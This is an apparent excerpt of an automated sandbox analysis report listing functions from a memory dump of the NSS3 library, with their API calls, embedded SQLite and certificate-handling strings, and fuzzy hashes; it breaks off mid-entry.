memset.VCRUNTIME140(?,00000000,00002010), ref: 6C7DB2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7DB3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7DB40C

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: 6622f40e3f63b5954a03008dca1277074296384f8fa25b3a2f763ed3a8dd032c
Instruction ID: e27f82db3c0c3700629e5e64354221eabc0f9c98c2d9e67cd2aca0100eb8d7c2
Opcode Fuzzy Hash: 6622f40e3f63b5954a03008dca1277074296384f8fa25b3a2f763ed3a8dd032c
Instruction Fuzzy Hash: BE22DE71A04301AFE710CF14CE49B9A77E1AF84308F25893CE8595B792E732F859CB96

Function 6C721F90 Relevance: 35.9, APIs: 5, Strings: 18, Instructions: 1430COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C7225F3

Strings

unsafe use of virtual table "%s", xrefs: 6C7230D1
H, xrefs: 6C72322D
too many references to "%s": max 65535, xrefs: 6C722FB6
no such index: "%s", xrefs: 6C72319D
a NATURAL join may not have an ON or USING clause, xrefs: 6C7232C1
no such table: %s, xrefs: 6C7226AC
too many columns in result set, xrefs: 6C723012
H, xrefs: 6C72329F
access to view "%s" prohibited, xrefs: 6C722F4A
%s.%s.%s, xrefs: 6C72302D
cannot have both ON and USING clauses in the same join, xrefs: 6C7232B5
multiple recursive references: %s, xrefs: 6C7222E0
recursive reference in a subquery: %s, xrefs: 6C7222E5
no tables specified, xrefs: 6C7226BE
'%s' is not a function, xrefs: 6C722FD2
table %s has %d values for %d columns, xrefs: 6C72316C
%s.%s, xrefs: 6C722D68
cannot join using column %s - column not present in both tables, xrefs: 6C7232AB

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpy
String ID: %s.%s$%s.%s.%s$'%s' is not a function$H$H$a NATURAL join may not have an ON or USING clause$access to view "%s" prohibited$cannot have both ON and USING clauses in the same join$cannot join using column %s - column not present in both tables$multiple recursive references: %s$no such index: "%s"$no such table: %s$no tables specified$recursive reference in a subquery: %s$table %s has %d values for %d columns$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
API String ID: 3510742995-3400015513
Opcode ID: 8f3383e240f5fd05c693267cc34c2fc3c8fc8798bd661658d3138e46cb059ab2
Instruction ID: 26a28031003d015d78c770ca0042eb0cf94bb1d67f6af40581b16a1677b27d86
Opcode Fuzzy Hash: 8f3383e240f5fd05c693267cc34c2fc3c8fc8798bd661658d3138e46cb059ab2
Instruction Fuzzy Hash: 3DD2B170E14209CFDB14CF99C688B9DB7B2FF49328F288169D855ABB51D739E842CB50

Function 6C75ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C75ED38

Part of subcall function 6C6F4F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6F4FC4

sqlite3_mprintf.NSS3(snippet), ref: 6C75EF3C
sqlite3_mprintf.NSS3(offsets), ref: 6C75EFE4

Part of subcall function 6C81DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C6F5001,?,00000003,00000000), ref: 6C81DFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6C75F087
sqlite3_mprintf.NSS3(matchinfo), ref: 6C75F129
sqlite3_mprintf.NSS3(optimize), ref: 6C75F1D1
sqlite3_free.NSS3(?), ref: 6C75F368

Strings

offsets, xrefs: 6C75EFAF, 6C75EFDF, 6C75F01F
fts3tokenize, xrefs: 6C75F30F
matchinfo, xrefs: 6C75F04F, 6C75F082, 6C75F0C2, 6C75F0F2, 6C75F124, 6C75F169
simple, xrefs: 6C75ED79
fts3, xrefs: 6C75F247
fts4aux, xrefs: 6C75ECF9
porter, xrefs: 6C75ED97
optimize, xrefs: 6C75F199, 6C75F1CC, 6C75F211
snippet, xrefs: 6C75EF05, 6C75EF37, 6C75EF7C
fts4, xrefs: 6C75F2AD
fts3_tokenizer, xrefs: 6C75EE1A, 6C75EEA8
unicode61, xrefs: 6C75EDB5

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: f43f7779ce20d610674eecb81d6d5d7790f4a27619d3dae9122026f2cd317c96
Instruction ID: 117d2f3c65b29898456e21663fcd6e1de240bc135b30f18fc3b54df60e399fb0
Opcode Fuzzy Hash: f43f7779ce20d610674eecb81d6d5d7790f4a27619d3dae9122026f2cd317c96
Instruction Fuzzy Hash: A302EFB1B043004BE7149F719A8A72B36B2BBC560CF54893CD85A87B41EF75E95AC7C2

Function 6C7D7C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7D7C33
NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C7D7C66
CERT_DestroyCertificate.NSS3(00000000), ref: 6C7D7D1E

Part of subcall function 6C7D7870: SECOID_FindOID_Util.NSS3(?,?,?,6C7D91C5), ref: 6C7D788F

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7D7D48
PR_SetError.NSS3(FFFFE067,00000000), ref: 6C7D7D71
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C7D7DD3
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7D7DE1
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7D7DF8
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C7D7E1A
PR_SetError.NSS3(FFFFE067,00000000), ref: 6C7D7E58

Part of subcall function 6C7D7870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7D91C5), ref: 6C7D78BB
Part of subcall function 6C7D7870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C7D91C5), ref: 6C7D78FA
Part of subcall function 6C7D7870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C7D91C5), ref: 6C7D7930
Part of subcall function 6C7D7870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7D91C5), ref: 6C7D7951
Part of subcall function 6C7D7870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7D7964
Part of subcall function 6C7D7870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C7D797A
Part of subcall function 6C7D7870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C7D7988
Part of subcall function 6C7D7870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C7D7998
Part of subcall function 6C7D7870: free.MOZGLUE(00000000), ref: 6C7D79A7
Part of subcall function 6C7D7870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C7D91C5), ref: 6C7D79BB
Part of subcall function 6C7D7870: PR_GetCurrentThread.NSS3(?,?,?,?,6C7D91C5), ref: 6C7D79CA

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7D7E49
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7D7F8C
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C7D7F98
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7D7FBF
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C7D7FD9
PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C7D8038
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C7D8050
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C7D8093
SECOID_FindOID_Util.NSS3 ref: 6C7D7F29

Part of subcall function 6C7D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C778298,?,?,?,6C76FCE5,?), ref: 6C7D07BF
Part of subcall function 6C7D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7D07E6
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D081B
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D0825

SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C7D8072
SECOID_FindOID_Util.NSS3 ref: 6C7D80F5

Part of subcall function 6C7DBC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C7D800A,00000000,?,00000000,?), ref: 6C7DBC3F

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
String ID:
API String ID: 2815116071-0
Opcode ID: e10c9346cb5e1a4ee120546e69f996155522dd84f4f310cc4d366ea7a6afa712
Instruction ID: e35c237e14c2fee0d5131cb36687b80b3c05c495b39d9518c6ac9994f132ff2d
Opcode Fuzzy Hash: e10c9346cb5e1a4ee120546e69f996155522dd84f4f310cc4d366ea7a6afa712
Instruction Fuzzy Hash: 6AE1C0706083019FE710CF28DA84B5AB7E5AF44308F16497DE88A9BB55E732FC05CB92

Function 6C761C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6C761C6B
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C761C75
GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C761CA1
GetLengthSid.ADVAPI32(?), ref: 6C761CA9
malloc.MOZGLUE(00000000), ref: 6C761CB4
CopySid.ADVAPI32(00000000,00000000,?), ref: 6C761CCC
GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C761CE4
GetLengthSid.ADVAPI32(?), ref: 6C761CEC
malloc.MOZGLUE(00000000), ref: 6C761CFD
CopySid.ADVAPI32(00000000,00000000,?), ref: 6C761D0F
CloseHandle.KERNEL32(?), ref: 6C761D17
AllocateAndInitializeSid.ADVAPI32 ref: 6C761D4D
GetLastError.KERNEL32 ref: 6C761D73
PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C761D7F

Strings

_PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C761D7A

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
API String ID: 3748115541-1216436346
Opcode ID: cfabb4d555a9710d8496933bfdcf5b852f210d2eb5ab2c43f4c3f44ab1ff0e09
Instruction ID: 2304f9f71ce8ded02bea8340df84ad0068ed14e7dd04071f7ff449f27396a2db
Opcode Fuzzy Hash: cfabb4d555a9710d8496933bfdcf5b852f210d2eb5ab2c43f4c3f44ab1ff0e09
Instruction Fuzzy Hash: DF3165F1A00218AFDF20DF64DD49BAA7BB8FF4A349F004475FA0992551E7305A94CFA5

Function 6C763D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C763DFB
__allrem.LIBCMT ref: 6C763EEC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C763FA3
memcpy.VCRUNTIME140(?,?,00000001), ref: 6C764047
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7640DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C76415F
__allrem.LIBCMT ref: 6C76416B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C764288
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7642AB
__allrem.LIBCMT ref: 6C7642B7

Strings

%04d, xrefs: 6C76407B
%02d, xrefs: 6C764086
%03d, xrefs: 6C7642E8
%lld, xrefs: 6C763FB2

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
String ID: %02d$%03d$%04d$%lld
API String ID: 703928654-3678606288
Opcode ID: 87c9e85b5200f379c60fe837250971dd9e46fadccccbc5ff28edde16f41ad19a
Instruction ID: d41926ec2802168e2cdecd10fce379b8414dd5a76c085b4ad15225df59d23130
Opcode Fuzzy Hash: 87c9e85b5200f379c60fe837250971dd9e46fadccccbc5ff28edde16f41ad19a
Instruction Fuzzy Hash: 84F14471A087409FD725CF39CA50BABB7F6AF96308F148A2DF88597A51E730D845CB42

Function 6C76EF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C76EF63

Part of subcall function 6C7787D0: PORT_NewArena_Util.NSS3(00000800,6C76EF74,00000000), ref: 6C7787E8
Part of subcall function 6C7787D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C76EF74,00000000), ref: 6C7787FD
Part of subcall function 6C7787D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C77884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C76F2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C76F2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C76F30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C76F374
PL_strcasecmp.NSS3(6C8B2FD4,?), ref: 6C76F457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C76F4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C76F66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C76F67D
CERT_DestroyName.NSS3(?), ref: 6C76F68B

Part of subcall function 6C778320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C778338
Part of subcall function 6C778320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C778364
Part of subcall function 6C778320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C77838E
Part of subcall function 6C778320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7783A5
Part of subcall function 6C778320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7783E3

Part of subcall function 6C7784C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C7784D9
Part of subcall function 6C7784C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C778528

Part of subcall function 6C778900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C76F599,?,00000000), ref: 6C778955

Strings

oid., xrefs: 6C76F2CF
", xrefs: 6C76F21B
*, xrefs: 6C76F3C6

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.
API String ID: 4161946812-2398207183
Opcode ID: 6ffeabcbd96bde21999d43d5b794f0b86d47114f91c7c76f0446a1fbcf55461a
Instruction ID: bd725fc96599827d6cba9b5920d9647394b0953191b786459675dedd800f91d4
Opcode Fuzzy Hash: 6ffeabcbd96bde21999d43d5b794f0b86d47114f91c7c76f0446a1fbcf55461a
Instruction Fuzzy Hash: A62219716083414FD714CE2ACA9076AB7E6AB85358F184A3EECD587F92E7319C05CB93

Function 6C711C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C711D58
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C711EFD
sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C711FB7

Strings

attached databases must use the same text encoding as main database, xrefs: 6C7120CA
another row available, xrefs: 6C712287
no more rows available, xrefs: 6C712264
table, xrefs: 6C711C8B
unknown error, xrefs: 6C712291
sqlite_master, xrefs: 6C711C61
unsupported file format, xrefs: 6C712188
abort due to ROLLBACK, xrefs: 6C712223
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C711F83
sqlite_temp_master, xrefs: 6C711C5C

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
API String ID: 563213449-2102270813
Opcode ID: dea1d864c7d7d5886dd6e514e21b655ffd4d2067221321855073b359319f77b1
Instruction ID: 2bf864f768feed7cd65bedacd5526959319801d9c9c52009437eb42d2f96a51d
Opcode Fuzzy Hash: dea1d864c7d7d5886dd6e514e21b655ffd4d2067221321855073b359319f77b1
Instruction Fuzzy Hash: 3812A07060C3419FD715CF19C184A5AB7F2BF86318F198A6DE8958BF52D731E84ACB82

Function 6C735F20 Relevance: 22.5, APIs: 5, Strings: 8, Instructions: 3043COMMON

Download Yara Rule

Strings

NOCASE, xrefs: 6C738703
2, xrefs: 6C7365B4
-, xrefs: 6C7362F9
BINARY, xrefs: 6C738708, 6C738737, 6C7387B8
u, xrefs: 6C7381DA
ON clause references tables to its right, xrefs: 6C736BEC
sub-select returns %d columns - expected %d, xrefs: 6C73805F
-, xrefs: 6C736228

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID: -$-$2$BINARY$NOCASE$ON clause references tables to its right$sub-select returns %d columns - expected %d$u
API String ID: 0-3593521594
Opcode ID: 94540471a13fed412ce2a784ea0a28c8dd53561ad782d27321a2e6dcae09263e
Instruction ID: 405a220d5575faf2cc2855aa1e431fc3c326727f49dd367f7dd05c8b40009134
Opcode Fuzzy Hash: 94540471a13fed412ce2a784ea0a28c8dd53561ad782d27321a2e6dcae09263e
Instruction Fuzzy Hash: 3043A374608351CFD304CF28C694B1ABBE2BF89318F14966DE8998B753D731E946CB92

Function 6C7DEFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7DC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C7DDAE2,?), ref: 6C7DC6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7DF0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7DF0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C7DF101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7DF11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C8A218C), ref: 6C7DF183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C7DF19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7DF1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C7DF1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C7DF210

Part of subcall function 6C7852D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C7DF1E9,?,00000000,?,?), ref: 6C7852F5
Part of subcall function 6C7852D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C78530F
Part of subcall function 6C7852D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C785326
Part of subcall function 6C7852D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C7DF1E9,?,00000000,?,?), ref: 6C785340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7DF227

Part of subcall function 6C7CFAB0: free.MOZGLUE(?,-00000001,?,?,6C76F673,00000000,00000000), ref: 6C7CFAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C7DF23E

Part of subcall function 6C7CBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C77E708,00000000,00000000,00000004,00000000), ref: 6C7CBE6A
Part of subcall function 6C7CBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7804DC,?), ref: 6C7CBE7E
Part of subcall function 6C7CBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C7CBEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C7DF2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C7DF3A8

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C7DF3B3

Part of subcall function 6C782D20: PK11_DestroyObject.NSS3(?,?), ref: 6C782D3C
Part of subcall function 6C782D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C782D5F

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

